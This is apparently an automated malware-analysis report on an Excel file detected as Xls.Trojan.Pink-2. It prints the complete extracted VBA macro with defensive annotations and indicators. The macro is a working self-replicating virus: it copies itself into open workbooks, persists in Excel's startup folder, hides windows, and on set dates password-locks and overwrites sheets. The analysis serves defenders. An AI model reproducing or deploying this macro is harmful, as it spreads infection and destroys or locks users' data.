MALICIOUS
88
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
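The file is an Excel document containing VBA macros, including an Auto_Open macro, which is a common technique for initial execution. The ClamAV detection 'Xls.Trojan.Pink-2' and the presence of VBA macros strongly suggest malicious intent, likely to download and execute further payloads. Note, however, that the extracted macro previewed below contains no network or download calls: what it visibly does is copy its module into other open workbooks, save a copy of itself as B00k1.xls in the Excel startup folder, and on certain dates protect the active sheet with a random password. The macro attempts to hide its presence by renaming modules and manipulating workbook visibility, indicating a deliberate effort to evade detection.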
Heuristics 3
-
ClamAV: Xls.Trojan.Pink-2 — critical — CLAMAV_DETECTION — ClamAV detected this file as malware: Xls.Trojan.Pink-2
-
VBA macros detected — medium — 1 related finding — OLE_VBA_MACROS — Document contains VBA macro code
-
Auto_Open macro — low — OLE_VBA_AUTO — Auto_Open macro. Matched line in script:
Sub auto_open()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4485 bytes |

SHA-256: 6ac49b120d1b6cb8654406bd32290f418c112a95238fd2ad037162683052413c
Preview script — first 1,000 lines of the extracted script
Attribute VB_Name = "NV12910"
' Entry point: Excel runs a macro named Auto_Open when the workbook is opened
' (this is the line matched by the OLE_VBA_AUTO heuristic above).
Sub auto_open()
' Registers "pink" as the application-wide OnSheetActivate handler, so the
' main routine runs each time any sheet is activated, not just once at open.
Application.OnSheetActivate = "pink"
End Sub
' Main routine of the sample, invoked through Application.OnSheetActivate.
' Reading the listing top to bottom, it:
'   1. hides (and saves) an open workbook named "B00k1.xls", if there is one;
'   2. copies this workbook's "?V..." module sheet into the active workbook
'      under a freshly generated name, unless that workbook already has one;
'   3. on specific dates protects the active sheet with a random password and,
'      on 15 June, also overwrites formatting and a block of cells;
'   4. saves a copy of this workbook as B00k1.xls in Application.StartupPath
'      and repoints OnSheetActivate at that copy.
' Artifacts visible in this listing that a defender can look for: a file named
' B00k1.xls in the Excel startup folder, module names whose second character
' is "V", and the formula ="" in cell IV65536.
Sub pink()
' In VBA only the name directly before each "As" gets that type: getname is a
' String and thisnum an Integer; every other name here is a Variant.
' namemo, used further down, is not declared in this line at all.
Dim mn, virname, thismo, passwords, pick, pickmo, head, getname As String, i, j, k, num, wbc, thisnum As Integer
wbc = Workbooks.count
' Look for an already-open copy named "B00k1.xls"; if found, remember that in
' getname, hide its window, and save it if it has unsaved changes.
For k = 1 To wbc
If Workbooks(k).Name = "B00k1.xls" Then
getname = "B00k1.xls"
Windows("B00k1.xls").Visible = False
If Workbooks("B00k1.xls").Saved = False Then
Workbooks("B00k1.xls").Save
End If
Exit For
End If
Next
' With fewer than two workbooks open, skip the copy step and the date-triggered
' actions and go straight to the startup-folder step at "final".
If wbc < 2 Then
GoTo final
End If
thisnum = ThisWorkbook.Modules.count
num = ActiveWorkbook.Modules.count
' Find the module in this workbook whose name has "V" as its second character
' (the module shown in this preview is named "NV12910") and keep its name.
For i = 1 To thisnum
thismo = ThisWorkbook.Modules(i).Name
pickmo = Right(Left(thismo, 2), 1)
If pickmo = "V" Then
namemo = ThisWorkbook.Modules(i).Name
Exit For
End If
Next
' head = first character of the active workbook's name when it is an ASCII
' letter (a-z or A-Z), otherwise the literal "N".
If (Asc(ActiveWorkbook.Name) >= 97 And Asc(ActiveWorkbook.Name) <= 122) Or (Asc(ActiveWorkbook.Name) >= 65 And Asc(ActiveWorkbook.Name) <= 90) Then
head = Chr(Asc(ActiveWorkbook.Name))
Else
head = "N"
End If
' New module name: head, "V", current month, current day, and the last two
' characters of Time$. The name therefore differs between copies; only the
' "V" in second position is constant.
mn = head & "V" & Month(Now) & Day(Now) & Right(Time$, 2)
' Marker check: if any module in the active workbook already has "V" as its
' second character, End stops all macro execution here. A legitimate module
' whose name happens to match would have the same effect.
For j = 1 To num
pick = Right(Left(ActiveWorkbook.Modules(j).Name, 2), 1)
If pick = "V" Then
End
End If
Next
' Unless month + day equals 13, set the last cell of the active sheet
' (IV65536) to the formula ="" if it does not already hold it. This replaces
' whatever was in that cell.
' NOTE(review): the purpose is not shown in this listing; possibly a marker - confirm.
If Month(Now) + Day(Now) <> 13 And ActiveSheet.Range("iv65536").FormulaR1C1 <> "=""""" Then
ActiveSheet.Range("iv65536").FormulaR1C1 = "="""""
End If
' Copy the module sheet into the active workbook, placed before its active
' sheet, then rename the copy to the generated name mn.
ThisWorkbook.Sheets(namemo).Copy ActiveWorkbook.ActiveSheet
ActiveWorkbook.Modules(namemo).Name = mn
' Empty branch: the condition is evaluated but nothing is executed.
If Left(ActiveWorkbook.Name, 4) <> "Book" Then
End If
' Screen redraw is switched off from here on; nothing in this listing turns it back on.
Application.ScreenUpdating = False
' Password = first 8 characters of a random number converted to text. The
' listing never stores or displays it.
' NOTE(review): no Randomize call appears in this listing, so the Rnd sequence
' may be reproducible - confirm before relying on that to recover a sheet.
passwords = Left((Rnd * 1000000000 + 100000000), 8)
' Date trigger 1: month + day = 13 (for example 12 January or 1 December):
' protect the active sheet with the random password.
If Month(Now) + Day(Now) = 13 Then
ActiveSheet.Protect DrawingObjects:=True, Contents:=True, Scenarios:=True, password:=passwords
End If
' Date trigger 2: 15 June: clear all cell formats, shrink column width, row
' height and zoom, write "OO" into the fixed set of cells listed below
' (overwriting their contents), then protect the sheet.
If Month(Now) = 6 And Day(Now) = 15 Then
With Cells
.ClearFormats
.ColumnWidth = 2.75
.RowHeight = 15
End With
ActiveWindow.Zoom = 25
Union(Range( _
"AO15,AP15,AO16,AP16,AO16,AO17,AP17,AO18,AP18,AO19,AP19,AO20,AP20,AO21,AP21,AO22,AP22,AO23,AP23,AO24,AP24,AO25,AP25,AO26,AP26,AO27,AP27,AO28,AP28,AO29,AP29,AO30" _
), Range( _
"AP30,AO31,AP31,AN19,AM19,AL19,AK19,AJ19,AJ19,AI19,AH19,AG19,AG20,AH20,AI20,AJ20,AK20,AL20,AM20,AN20,AG18,AH18,AI18,AJ18,AK18,AL18,AM18,AN18,AQ18,AR18,AS18,AT18" _
), Range( _
"AU18,AV18,AW18,AX18,AQ19,AR19,AS19,AT19,AU19,AV19,AW19,AX19,AQ20,AR20,AS20,AT20,AU20,AV20,AW20,AX20,AQ30,AR30,AS30,AT30,AU30,AV30,AW30,AX30,AQ31,AR31,AS31,AT31" _
), Range( _
"AU31,AV31,AW31,AX31,AG21,AG22,AG23,AG24,AG25,AG26,AG27,AG28,AG29,AG30,AG31,AH21,AH22,AH23,AH24,AH25,AH26,AH27,AH28,AH29,AH30,AH31,AW17,AW16,AW15,AW14,AW14,AW13" _
), Range( _
"AW12,AW11,AW11,AW10,AW9,AW8,AW7,AX7,AX8,AX9,AX10,AX11,AX12,AX13,AX14,AX15,AX16,AX17,AG6,AH6,AI6,AJ6,AK6,AL6,AM6,AN6,AO6,AP6,AW6,AX6,AG31,AG31" _
), Range( _
"AG32,AH32,AO32,AP32,AQ32,AR32,AS32,AT32,AU32,AV32,AW32,AX32,AG7,AH7,AI7,AJ7,AK7,AL7,AM7,AN7,AO7,AP7,AG8,AH8,AI8,AJ8,AK8,AL8,AM8,AN8,AO8,AP8" _
), Range("AO9,AP9,AO10,AP10,AO11,AP11,AO12,AP12,AO13,AP13,AO14,AP14")) = "OO"
ActiveSheet.Protect DrawingObjects:=True, Contents:=True, Scenarios:=True, password:=passwords
' Date trigger 3: month + day = 22: protect the active sheet only.
ElseIf Month(Now) + Day(Now) = 22 Then
ActiveSheet.Protect DrawingObjects:=True, Contents:=True, Scenarios:=True, password:=passwords
End If
final:
' Startup-folder step. Dir returns "" when no B00k1.xls exists in
' Application.StartupPath, the folder Excel auto-opens workbooks from.
virname = Dir(Application.StartupPath & "\B00k1.xls")
If virname = "" Then
' Set the IV65536 formula on this workbook's second sheet, then save a copy of
' this workbook into the startup folder as B00k1.xls.
ThisWorkbook.Sheets(2).Range("iv65536").FormulaR1C1 = "="""""
ThisWorkbook.SaveCopyAs Filename:=Application.StartupPath & "\" & "B00k1.xls"
' If no open workbook named B00k1.xls was found at the top of this run,
' clear the OnSheetActivate handler and stop all execution.
If getname = "" Then
Application.OnSheetActivate = ""
End
End If
' Otherwise hide the active window.
ActiveWindow.Visible = False
End If
' Repoint the sheet-activation handler at the "pink" macro of the
' startup-folder copy, so later activations run it from there.
Application.OnSheetActivate = Application.StartupPath & "\" & "B00k1!pink"
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||